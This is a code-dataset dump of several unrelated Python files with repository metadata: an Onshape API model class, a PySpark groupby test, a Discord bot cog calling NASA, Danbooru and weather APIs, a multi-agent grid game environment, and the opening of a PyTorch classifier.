            wav_10k, cuda=cuda, mode=mode, your_vocoder_func=your_vocoder_func
        )
        save_wave(out_np_wav, fname=output, sample_rate=44100)
| 40.785714
| 127
| 0.570053
|
e46509404c1da16bf74fffac2e5ba1d83e29df14
| 5,326
|
py
|
Python
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 14
|
2019-06-23T08:47:41.000Z
|
2021-11-29T16:28:45.000Z
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 40
|
2019-05-22T14:39:46.000Z
|
2022-03-10T10:36:17.000Z
|
python/onshape_client/oas/models/btp_statement_return281_all_of.py
|
toebes/onshape-clients
|
a26cf6a77cfc7901321e603d5a097e23eb51e35c
|
[
"MIT"
] | 24
|
2019-06-02T01:03:41.000Z
|
2022-03-29T13:25:36.000Z
|
# coding: utf-8
"""
Onshape REST API
The Onshape REST API consumed by all clients. # noqa: E501
The version of the OpenAPI document: 1.113
Contact: api-support@onshape.zendesk.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
import sys # noqa: F401
import six # noqa: F401
import nulltype # noqa: F401
from onshape_client.oas.model_utils import ( # noqa: F401
ModelComposed,
ModelNormal,
ModelSimple,
date,
datetime,
file_type,
int,
none_type,
str,
validate_get_composed_info,
)
try:
from onshape_client.oas.models import btp_expression9
except ImportError:
btp_expression9 = sys.modules["onshape_client.oas.models.btp_expression9"]
try:
from onshape_client.oas.models import btp_space10
except ImportError:
btp_space10 = sys.modules["onshape_client.oas.models.btp_space10"]
class BTPStatementReturn281AllOf(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
@staticmethod
def openapi_types():
"""
This must be a class method so a model may have properties that are
of type self, this ensures that we don't create a cyclic import
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"bt_type": (str,), # noqa: E501
"space_after_return": (btp_space10.BTPSpace10,), # noqa: E501
"value": (btp_expression9.BTPExpression9,), # noqa: E501
}
@staticmethod
def discriminator():
return None
attribute_map = {
"bt_type": "btType", # noqa: E501
"space_after_return": "spaceAfterReturn", # noqa: E501
"value": "value", # noqa: E501
}
@staticmethod
def _composed_schemas():
return None
required_properties = set(
[
"_data_store",
"_check_type",
"_from_server",
"_path_to_item",
"_configuration",
]
)
def __init__(
self,
_check_type=True,
_from_server=False,
_path_to_item=(),
_configuration=None,
**kwargs
): # noqa: E501
"""btp_statement_return281_all_of.BTPStatementReturn281AllOf - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_from_server (bool): True if the data is from the server
False if the data is from the client (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
bt_type (str): [optional] # noqa: E501
space_after_return (btp_space10.BTPSpace10): [optional] # noqa: E501
value (btp_expression9.BTPExpression9): [optional] # noqa: E501
"""
self._data_store = {}
self._check_type = _check_type
self._from_server = _from_server
self._path_to_item = _path_to_item
self._configuration = _configuration
for var_name, var_value in six.iteritems(kwargs):
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
| 33.496855
| 97
| 0.614532
|
c6a2852e5b2718a41834746d657d4baa50746bc3
| 5,360
|
py
|
Python
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2021-06-29T01:32:35.000Z
|
2021-08-19T15:20:26.000Z
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 29
|
2021-06-02T09:17:28.000Z
|
2022-03-14T01:35:18.000Z
|
python/pyspark/pandas/tests/test_ops_on_diff_frames_groupby_expanding.py
|
nolanliou/spark
|
20750a3f9e13a2f02860859f87bbc38a18cba85e
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2017-03-04T15:26:52.000Z
|
2021-12-17T17:42:52.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from distutils.version import LooseVersion
import numpy as np
import pandas as pd
from pyspark import pandas as ps
from pyspark.pandas.config import set_option, reset_option
from pyspark.testing.pandasutils import PandasOnSparkTestCase, TestUtils
class OpsOnDiffFramesGroupByExpandingTest(PandasOnSparkTestCase, TestUtils):
    """Compare pandas-on-Spark expanding-groupby results against pandas when
    the groupby key comes from a different frame than the grouped data."""
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Grouping by a key Series from another frame requires this option.
        set_option("compute.ops_on_diff_frames", True)
    @classmethod
    def tearDownClass(cls):
        # Restore the default before other suites run.
        reset_option("compute.ops_on_diff_frames")
        super().tearDownClass()
    def _test_groupby_expanding_func(self, f):
        """Run aggregation ``f`` (by name) over Series, DataFrame, and single/
        list column selections, asserting parity with pandas."""
        pser = pd.Series([1, 2, 3])
        pkey = pd.Series([1, 2, 3], name="a")
        psser = ps.from_pandas(pser)
        kkey = ps.from_pandas(pkey)
        self.assert_eq(
            getattr(psser.groupby(kkey).expanding(2), f)().sort_index(),
            getattr(pser.groupby(pkey).expanding(2), f)().sort_index(),
        )
        pdf = pd.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
        pkey = pd.Series([1, 2, 3, 2], name="a")
        psdf = ps.from_pandas(pdf)
        kkey = ps.from_pandas(pkey)
        self.assert_eq(
            getattr(psdf.groupby(kkey).expanding(2), f)().sort_index(),
            getattr(pdf.groupby(pkey).expanding(2), f)().sort_index(),
        )
        self.assert_eq(
            getattr(psdf.groupby(kkey)["b"].expanding(2), f)().sort_index(),
            getattr(pdf.groupby(pkey)["b"].expanding(2), f)().sort_index(),
        )
        self.assert_eq(
            getattr(psdf.groupby(kkey)[["b"]].expanding(2), f)().sort_index(),
            getattr(pdf.groupby(pkey)[["b"]].expanding(2), f)().sort_index(),
        )
    def test_groupby_expanding_count(self):
        # The behaviour of ExpandingGroupby.count are different between pandas>=1.0.0 and lower,
        # and we're following the behaviour of latest version of pandas.
        if LooseVersion(pd.__version__) >= LooseVersion("1.0.0"):
            self._test_groupby_expanding_func("count")
        else:
            # Pre-1.0 pandas disagrees, so compare against hand-built expected
            # frames instead of calling pandas directly.
            # Series
            psser = ps.Series([1, 2, 3])
            kkey = ps.Series([1, 2, 3], name="a")
            midx = pd.MultiIndex.from_tuples(
                list(zip(kkey.to_pandas().values, psser.index.to_pandas().values)),
                names=["a", None],
            )
            expected_result = pd.Series([np.nan, np.nan, np.nan], index=midx)
            self.assert_eq(
                psser.groupby(kkey).expanding(2).count().sort_index(), expected_result.sort_index()
            )
            # DataFrame
            psdf = ps.DataFrame({"a": [1, 2, 3, 2], "b": [4.0, 2.0, 3.0, 1.0]})
            kkey = ps.Series([1, 2, 3, 2], name="a")
            midx = pd.MultiIndex.from_tuples([(1, 0), (2, 1), (2, 3), (3, 2)], names=["a", None])
            expected_result = pd.DataFrame(
                {"a": [None, None, 2.0, None], "b": [None, None, 2.0, None]}, index=midx
            )
            self.assert_eq(
                psdf.groupby(kkey).expanding(2).count().sort_index(), expected_result.sort_index()
            )
            expected_result = pd.Series([None, None, 2.0, None], index=midx, name="b")
            self.assert_eq(
                psdf.groupby(kkey)["b"].expanding(2).count().sort_index(),
                expected_result.sort_index(),
            )
            expected_result = pd.DataFrame({"b": [None, None, 2.0, None]}, index=midx)
            self.assert_eq(
                psdf.groupby(kkey)[["b"]].expanding(2).count().sort_index(),
                expected_result.sort_index(),
            )
    def test_groupby_expanding_min(self):
        self._test_groupby_expanding_func("min")
    def test_groupby_expanding_max(self):
        self._test_groupby_expanding_func("max")
    def test_groupby_expanding_mean(self):
        self._test_groupby_expanding_func("mean")
    def test_groupby_expanding_sum(self):
        self._test_groupby_expanding_func("sum")
    def test_groupby_expanding_std(self):
        self._test_groupby_expanding_func("std")
    def test_groupby_expanding_var(self):
        self._test_groupby_expanding_func("var")
if __name__ == "__main__":
    import unittest
    from pyspark.pandas.tests.test_ops_on_diff_frames_groupby_expanding import *  # noqa: F401
    # Prefer the XML test runner (JUnit-style reports for CI) when available;
    # fall back to the default text runner otherwise.
    try:
        import xmlrunner  # type: ignore[import]
        testRunner = xmlrunner.XMLTestRunner(output="target/test-reports", verbosity=2)
    except ImportError:
        testRunner = None
    unittest.main(testRunner=testRunner, verbosity=2)
| 39.124088
| 99
| 0.625
|
43a986766b0e690729eecf344f70123725edeefd
| 6,902
|
py
|
Python
|
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | null | null | null |
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | 1
|
2021-07-29T06:55:32.000Z
|
2021-07-29T06:55:32.000Z
|
src/cogs/apis.py
|
Dakskihedron/kitakami
|
0c1b9530690669aac581d9c8d98e605b9b253ad7
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
from datetime import datetime
import aiohttp
import json
import os
import random
import re
nasa_api_key = os.getenv('NASA_API_KEY')
owm_api_key = os.getenv('OWM_API_KEY')
class APIs(commands.Cog):
    """Commands related to APIs."""
    def __init__(self, bot):
        self.bot = bot
        # Maps author id -> message id of their last danbooru post, so
        # `undo` can find and delete it.
        self.image_cache = {}
        self.config = None
    async def get_data(self, url):
        """GET ``url`` and return ``(json_data, error_status_or_None)``.

        NOTE(review): ``aiohttp.web`` has no attribute ``Exception``; if that
        except clause is ever evaluated it raises AttributeError.  Also, the
        final branch only prints and falls through, so the coroutine returns
        None and callers fail when unpacking -- worth confirming and fixing.
        """
        timeout = aiohttp.ClientTimeout(total=10)
        async with aiohttp.ClientSession(timeout=timeout) as session:
            async with session.get(url) as r:
                data = await r.json()
                try:
                    r.raise_for_status()
                    return data, None
                except aiohttp.ClientResponseError as e:
                    status = e.status
                    return data, status
                except aiohttp.web.Exception as e:
                    print(e)
    @commands.Cog.listener()
    async def on_ready(self):
        """Load config.json on startup; disable `danbooru` without a blacklist."""
        print("Loading config file...")
        try:
            with open('././config.json') as config:
                self.config = json.load(config)
            print("Config file successfully loaded.")
            if 'blacklist' in self.config:
                print("Danbooru blacklist found.")
            else:
                # Treat a missing blacklist the same as a missing config file.
                raise FileNotFoundError()
        except FileNotFoundError:
            print(
                "Config file or Danbooru blacklist missing. "
                "Disabling 'danbooru' command."
            )
            self.bot.remove_command('danbooru')
    @commands.command()
    @commands.guild_only()
    async def apod(self, ctx, date=None):
        """Show the Astronomical Picture of the Day.

        date: yyyy-mm-dd
            Optional date for a specific picture.
        """
        url = f'https://api.nasa.gov/planetary/apod?api_key={nasa_api_key}'
        if date is not None:
            url += f'&date={date}'
        data, status = await self.get_data(url)
        if data and status:
            return await ctx.reply(f"{status}: {data['msg']}")
        if data['media_type'] == 'image':
            embed = discord.Embed(
                title=f"{data['title']}",
                colour=discord.Colour.blurple()
            )
            embed.set_image(url=data['url'])
            if 'copyright' in data:
                embed.set_footer(
                    text=f"Image Credit & Copyright: {data['copyright']}"
                )
            else:
                embed.set_footer(text='Public Domain')
            return await ctx.send(embed=embed)
        # YouTube APOD entries arrive as embed URLs; convert to a plain link
        # so Discord renders the player.
        if data['media_type'] == 'video' and 'youtube' in data['url']:
            url = re.search(
                'https://www.youtube.com/embed/(.*)?rel=0', data['url']
            )
            return await ctx.send(f"https://youtu.be/{url.group(1)}")
        await ctx.send(data['url'])
    @commands.command()
    @commands.is_nsfw()
    @commands.guild_only()
    async def danbooru(self, ctx, *, tags=''):
        """Show a random image from Danbooru.

        tag: str
            Optional tag(s) for narrowing image search.
        """
        # Reject any request whose tag string contains a blacklisted tag.
        for tag in self.config['blacklist']:
            if tag in tags.lower():
                return await ctx.reply("The specified tag(s) are blacklisted.")
        url = (
            f'https://danbooru.donmai.us/'
            f'posts.json?limit=200&tags={tags}')
        data, status = await self.get_data(url)
        if data and status:
            return await ctx.reply(f"{status}: {data['message']}")
        if len(data) == 0:
            return await ctx.reply(
                "The specified tag(s) returned no results."
            )
        post = random.choice(data)
        msg = await ctx.send(post['file_url'])
        # Remember the message so the author can `undo` it later.
        self.image_cache[ctx.author.id] = msg.id
    @commands.command()
    @commands.is_nsfw()
    @commands.guild_only()
    async def undo(self, ctx):
        """Remove your recently requested image."""
        try:
            request = self.image_cache[ctx.author.id]
        except KeyError:
            return await ctx.reply("No image to remove.")
        msg = await ctx.channel.fetch_message(request)
        await msg.delete()
        self.image_cache.pop(ctx.author.id)
    @commands.command()
    @commands.guild_only()
    async def weather(self, ctx, *, location):
        """Retrieve weather data for a location from OpenWeatherMap.

        location: str
            The location to retrieve weather data for.
        """
        url = (
            f'https://api.openweathermap.org/'
            f'data/2.5/weather?q={location}'
            f'&appid={owm_api_key}&units=metric'
        )
        data, status = await self.get_data(url)
        if data and status:
            return await ctx.reply(f"{status}: {data['message']}")
        # Local name `sys` shadows the conventional module name; it is the
        # OWM "sys" payload section here, not the stdlib module.
        sys = data['sys']
        weather = data['weather'][0]
        main = data['main']
        wind = data['wind']
        if 'country' not in sys:
            title = f"{data['name']}"
        else:
            title = f"{data['name']}, {sys['country']}"
        embed = discord.Embed(
            title=title,
            colour=discord.Colour.blurple(),
            description=(
                f"**{round(main['temp'])}\u00b0C**"
                f"\u2002{weather['main']} ({weather['description']})"
            )
        )
        embed.set_thumbnail(
            url=(
                f'http://openweathermap.org/'
                f"img/wn/{weather['icon']}@2x.png"
            )
        )
        # OWM omits the "rain" section entirely when there is no rain.
        if 'rain' not in data:
            rain = '0'
        else:
            rain = data['rain']['1h']
        # 16-point compass, with 'N' duplicated so a degree value just below
        # 360 rounds into the final bucket.
        compass_dir = [
            'N', 'NNE', 'NE', 'ENE',
            'E', 'ESE', 'SE', 'SSE',
            'S', 'SSW', 'SW', 'WSW',
            'W', 'WNW', 'NW', 'NNW',
            'N',
        ]
        wind_dir = compass_dir[round((wind['deg'] % 360) / 22.5)]
        embed.add_field(
            name='Temperatures',
            value=f"""
            Min Temp: {round(main['temp_min'])}\u00b0C
            Max Temp: {round(main['temp_max'])}\u00b0C
            """,
            inline=False
        )
        embed.add_field(
            name='Atmospherics',
            value=f"""
            Percipitation: {rain} mm
            Humidity: {main['humidity']}%
            Wind Speed: {round(wind['speed'], 1)} m/s {wind_dir}
            Atmos Pres: {main['pressure']} hPa
            """,
            inline=False
        )
        # NOTE(review): replacement fields spanning multiple lines inside an
        # f-string require Python 3.12+; confirm the target runtime version.
        embed.add_field(
            name='Times',
            value=f"""
            Sunrise: {datetime.fromtimestamp(sys['sunrise'])
                      .strftime('%I:%M %p')}
            Sunset: {datetime.fromtimestamp(sys['sunset'])
                     .strftime('%I:%M %p')}
            """,
            inline=False
        )
        await ctx.send(embed=embed)
def setup(bot):
    # discord.py extension hook: register the APIs cog on the bot.
    bot.add_cog(APIs(bot))
| 29.622318
| 79
| 0.509997
|
7690ed18505ddeac8d56fcc790302e460cd43b4e
| 10,468
|
py
|
Python
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 5
|
2020-05-25T03:08:09.000Z
|
2022-02-27T05:57:28.000Z
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 1
|
2020-12-22T01:35:36.000Z
|
2022-01-28T01:51:06.000Z
|
MAEnv/MAS_enviroment/MAS_Checkers.py
|
Abluceli/Multi-agent-Reinforcement-Learning-Algorithms
|
15810a559e2f2cf9e5fcb158c083f9e9dd6012fc
|
[
"MIT"
] | 1
|
2020-05-06T01:56:55.000Z
|
2020-05-06T01:56:55.000Z
|
#!/usr/bin/env python3
# encoding=utf-8
import numpy as np
import scipy.misc
class AgentObj:
    """A directional agent on a 2-D grid.

    Tracks position, colour/type, a tag ``mark`` counter and a ``hidden``
    countdown (an agent tagged twice is hidden for a while).
    Direction encoding: 0 = right, 1 = top, 2 = left, 3 = bottom.
    """

    # (dx, dy) of one step forward, indexed by direction.
    _FORWARD = {0: (1, 0), 1: (0, -1), 2: (-1, 0), 3: (0, 1)}
    # (dx, dy) of one step to the agent's left, indexed by direction.
    _LEFT = {0: (0, -1), 1: (-1, 0), 2: (0, 1), 3: (1, 0)}

    def __init__(self, coordinates, type, name, direction=0, mark=0, hidden=0):
        self.x, self.y = coordinates
        # 0: r, 1: g, 3: b
        self.type = type
        self.name = name
        self.hidden = hidden
        # 0: right, 1: top, 2: left, 3: bottom
        self.direction = direction
        self.mark = mark

    def is_hidden(self):
        """Whether the agent is currently removed from the board."""
        return self.hidden > 0

    def add_mark(self, agent_hidden):
        """Tag the agent once; two tags hide it for ``agent_hidden`` steps."""
        self.mark += 1
        if self.mark >= 2:
            self.mark = 0
            self.hidden = agent_hidden
        return self.mark

    def sub_hidden(self):
        """Tick the hidden countdown down by one, clamped at zero."""
        self.hidden = max(self.hidden - 1, 0)
        return self.hidden

    def turn_left(self, **kwargs):
        """Rotate 90 degrees counter-clockwise; return the new direction."""
        self.direction = (self.direction + 1) % 4
        return self.direction

    def turn_right(self, **kwargs):
        """Rotate 90 degrees clockwise; return the new direction."""
        self.direction = (self.direction + 3) % 4
        return self.direction

    def move_forward_delta(self):
        """(dx, dy) of a forward step for the current facing."""
        assert self.direction in range(4), 'wrong direction'
        return self._FORWARD[self.direction]

    def move_left_delta(self):
        """(dx, dy) of a leftward step for the current facing."""
        assert self.direction in range(4), 'wrong direction'
        return self._LEFT[self.direction]

    def _step(self, delta, env_x_size, env_y_size):
        # Apply (dx, dy); each axis is clamped independently so a move that
        # would leave the board on one axis is simply ignored on that axis.
        new_x, new_y = self.x + delta[0], self.y + delta[1]
        if 0 <= new_x < env_x_size:
            self.x = new_x
        if 0 <= new_y < env_y_size:
            self.y = new_y
        return self.x, self.y

    def move_forward(self, env_x_size, env_y_size):
        return self._step(self.move_forward_delta(), env_x_size, env_y_size)

    def move_backward(self, env_x_size, env_y_size):
        dx, dy = self.move_forward_delta()
        return self._step((-dx, -dy), env_x_size, env_y_size)

    def move_left(self, env_x_size, env_y_size):
        return self._step(self.move_left_delta(), env_x_size, env_y_size)

    def move_right(self, env_x_size, env_y_size):
        dx, dy = self.move_left_delta()
        return self._step((-dx, -dy), env_x_size, env_y_size)

    def stay(self, **kwargs):
        """No-op action."""
        pass

    def beam(self, env_x_size, env_y_size):
        """Cells covered by a beam fired forward, from the next cell to the wall."""
        assert self.direction in range(4), 'wrong direction'
        if self.direction == 0:
            return [(cx, self.y) for cx in range(self.x + 1, env_x_size)]
        if self.direction == 1:
            return [(self.x, cy) for cy in range(self.y - 1, -1, -1)]
        if self.direction == 2:
            return [(cx, self.y) for cx in range(self.x - 1, -1, -1)]
        return [(self.x, cy) for cy in range(self.y + 1, env_y_size)]
class FoodObj:
    """A collectible item on the grid with per-agent reward values."""

    def __init__(self, coordinates, type=1, agent1_reward=1, agent2_reward=2):
        # type: 1 is apple, 3 is lemon
        self.x, self.y = coordinates
        self.type = type
        self.agent1_reward = agent1_reward
        self.agent2_reward = agent2_reward

    def eat(self, agent, food_list):
        """Remove this food from ``food_list`` and return the eater's reward.

        Agents of type 2 receive ``agent1_reward``; all others receive
        ``agent2_reward``.
        """
        food_list.remove(self)
        if agent.type == 2:
            return self.agent1_reward
        return self.agent2_reward
class GameEnv:
    """Two-agent gathering environment on a small grid (Checkers variant).

    Agents collect apples/lemons with asymmetric rewards and can fire a
    beam; an agent tagged twice is hidden for a while (see AgentObj).
    """
    def __init__(self, widht=18, hight=3):
        # NOTE(review): 'widht'/'hight' spellings kept -- callers may pass
        # them as keyword arguments.
        self.size_x = widht
        self.size_y = hight
        self.objects = []
        self.agent1_beam_set = []
        self.agent2_beam_set = []
        # 0: forward, 1: backward, 2: left, 3: right
        # 4: trun lelf, 5:turn right, 6: beam, 7: stay
        self.action_num = 8
        self.reset()
    def reset(self):
        """Re-create both agents, their action tables and the food layout."""
        self.agent1 = AgentObj(coordinates=(16, 0), type=2, name='agent1', direction=2)
        self.agent2 = AgentObj(coordinates=(16, 2), type=0, name='agent2', direction=2)
        # Action index -> bound method; order matches the encoding above.
        self.agent1_actions = [self.agent1.move_forward, self.agent1.move_backward, self.agent1.move_left, self.agent1.move_right,
                               self.agent1.turn_left, self.agent1.turn_right, self.agent1.beam, self.agent1.stay]
        self.agent2_actions = [self.agent2.move_forward, self.agent2.move_backward, self.agent2.move_left, self.agent2.move_right,
                               self.agent2.turn_left, self.agent2.turn_right, self.agent2.beam, self.agent2.stay]
        self.agent1_beam_set = []
        self.agent2_beam_set = []
        self.food_objects = []
        # Checkerboard of apples (type 1) and lemons (type 3); rewards are
        # strongly asymmetric for agent1 (+/-10) and mild for agent2 (+/-1).
        for y in range(0, 3):
            is_apple = (y + 1) % 2
            for x in range(0, 16):
                food_type = 1 if is_apple else 3
                agent1_reward = 10 if is_apple else -10
                agent2_reward = 1 if is_apple else -1
                self.food_objects.append(FoodObj((x, y), type=food_type, agent1_reward=agent1_reward,
                                                 agent2_reward=agent2_reward))
                is_apple = not is_apple
    def is_done(self):
        # Episode ends when every food item has been eaten.
        return not self.food_objects
    def move(self, agent1_action, agent2_action):
        """Advance one step: apply both actions, resolve collisions, eat food.

        Returns the tuple (agent1_reward, agent2_reward) for this step.
        """
        assert agent1_action in range(8), 'agent1 take wrong action'
        assert agent2_action in range(8), 'agent2 take wrong action'
        agent1_old_x, agent1_old_y = self.agent1.x, self.agent1.y
        agent2_old_x, agent2_old_y = self.agent2.x, self.agent2.y
        # Tick down any hide countdowns before acting.
        self.agent1.sub_hidden()
        self.agent2.sub_hidden()
        # Action 6 (beam) returns the set of cells the beam covers; for all
        # other actions the return value is ignored here.
        agent1_action_return = self.agent1_actions[agent1_action](env_x_size=self.size_x, env_y_size=self.size_y)
        self.agent1_beam_set = [] if agent1_action != 6 else agent1_action_return
        agent2_action_return = self.agent2_actions[agent2_action](env_x_size=self.size_x, env_y_size=self.size_y)
        self.agent2_beam_set = [] if agent2_action != 6 else agent2_action_return
        # If both agents landed on the same cell, revert both moves.
        if self.agent1.x == self.agent2.x and self.agent1.y == self.agent2.y:
            self.agent1.x, self.agent1.y = agent1_old_x, agent1_old_y
            self.agent2.x, self.agent2.y = agent2_old_x, agent2_old_y
        agent1_reward = 0
        agent2_reward = 0
        # NOTE(review): food_objects is mutated (via eat) while iterating;
        # removal makes the loop skip the next element -- confirm intended.
        for food in self.food_objects:
            if food.x == self.agent1.x and food.y == self.agent1.y:
                agent1_reward = food.eat(agent=self.agent1, food_list=self.food_objects)
            elif food.x == self.agent2.x and food.y == self.agent2.y:
                agent2_reward = food.eat(agent=self.agent2, food_list=self.food_objects)
        return agent1_reward, agent2_reward
    def contribute_metrix(self):
        """Render the state as an (H+2, W+2, 3) float RGB array in [0, 1]."""
        a = np.ones([self.size_y + 2, self.size_x + 2, 3])
        # Grey one-cell border around the playing field.
        a[:, 0, 0] = 136 / 255
        a[:, 0, 1] = 138 / 255
        a[:, 0, 2] = 135 / 255
        a[:, self.size_x + 1, 0] = 136 / 255
        a[:, self.size_x + 1, 1] = 138 / 255
        a[:, self.size_x + 1, 2] = 135 / 255
        a[0, :, 0] = 136 / 255
        a[0, :, 1] = 138 / 255
        a[0, :, 2] = 135 / 255
        a[self.size_y + 1, :, 0] = 136 / 255
        a[self.size_y + 1, :, 1] = 138 / 255
        a[self.size_y + 1, :, 2] = 135 / 255
        # Black interior background.
        a[1:-1, 1:-1, :] = 0
        # Beams drawn in mid-grey (board coords are offset +1 by the border).
        for x, y in self.agent1_beam_set:
            a[y + 1, x + 1, 0] = 0.5
            a[y + 1, x + 1, 1] = 0.5
            a[y + 1, x + 1, 2] = 0.5
        for x, y in self.agent2_beam_set:
            a[y + 1, x + 1, 0] = 0.5
            a[y + 1, x + 1, 1] = 0.5
            a[y + 1, x + 1, 2] = 0.5
        for food in self.food_objects:
            if food.type == 1: # apple
                a[food.y + 1, food.x + 1, 0] = 177 / 255
                a[food.y + 1, food.x + 1, 1] = 245 / 255
                a[food.y + 1, food.x + 1, 2] = 90 / 255
            elif food.type == 3: # lemon
                a[food.y + 1, food.x + 1, 0] = 213 / 255
                a[food.y + 1, food.x + 1, 1] = 144 / 255
                a[food.y + 1, food.x + 1, 2] = 62 / 255
        for i in range(3):
            # Facing marker one cell ahead of each visible agent...
            if not self.agent1.is_hidden():
                delta_x, delta_y = self.agent1.move_forward_delta()
                a[self.agent1.y + 1 + delta_y, self.agent1.x + 1 + delta_x, i] = 40 / 255
            if not self.agent2.is_hidden():
                delta_x, delta_y = self.agent2.move_forward_delta()
                a[self.agent2.y + 1 + delta_y, self.agent2.x + 1 + delta_x, i] = 40 / 255
            # ...and the agent cell itself lit only in its type's channel.
            a[self.agent1.y + 1, self.agent1.x + 1, i] = 1 if i == self.agent1.type else 0
            a[self.agent2.y + 1, self.agent2.x + 1, i] = 1 if i == self.agent2.type else 0
        return a
    def render_env(self):
        """Upscale the board image by 10x (nearest neighbour) for display.

        NOTE(review): scipy.misc.imresize was removed in SciPy 1.3; this
        method requires an old SciPy (with Pillow) to run.
        """
        a = self.contribute_metrix()
        b = scipy.misc.imresize(a[:, :, 0], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
        c = scipy.misc.imresize(a[:, :, 1], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
        d = scipy.misc.imresize(a[:, :, 2], [10 * self.size_y, 10 * self.size_x, 1], interp='nearest')
        a = np.stack([b, c, d], axis=2)
        return a
    def train_render(self):
        """Render an 84x84x3 observation for training (same SciPy caveat)."""
        a = self.contribute_metrix()
        b = scipy.misc.imresize(a[:, :, 0], [84, 84, 1], interp='nearest')
        c = scipy.misc.imresize(a[:, :, 1], [84, 84, 1], interp='nearest')
        d = scipy.misc.imresize(a[:, :, 2], [84, 84, 1], interp='nearest')
        a = np.stack([b, c, d], axis=2)
        return a
| 38.344322
| 130
| 0.565055
|
0acc6e18d709b6905b274cbb7a2d5da4aa9ca38e
| 1,635
|
py
|
Python
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 492
|
2018-03-22T01:36:52.000Z
|
2022-03-24T03:34:52.000Z
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 24
|
2018-04-03T08:00:43.000Z
|
2022-01-28T02:04:27.000Z
|
architectures/LinearClassifier.py
|
JIAOJIAYUASD/FeatureLearningRotNet
|
6285773795b514dacb920ca172c895c3a01c68e8
|
[
"MIT"
] | 129
|
2018-03-27T09:59:37.000Z
|
2022-02-28T06:35:56.000Z
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class Flatten(nn.Module):
    """Collapse all dimensions after the batch dimension into one."""

    def __init__(self):
        super(Flatten, self).__init__()

    def forward(self, feat):
        # (B, *dims) -> (B, prod(dims)); view reuses the same storage.
        batch_size = feat.size(0)
        return feat.view(batch_size, -1)
class Classifier(nn.Module):
    """Linear classification head: adaptive pool -> batch-norm -> flatten -> linear.

    ``opt`` keys: 'nChannels', 'num_classes', 'pool_size', and optionally
    'pool_type' ('max' by default, or 'avg').
    """

    def __init__(self, opt):
        super(Classifier, self).__init__()
        num_channels = opt['nChannels']
        num_classes = opt['num_classes']
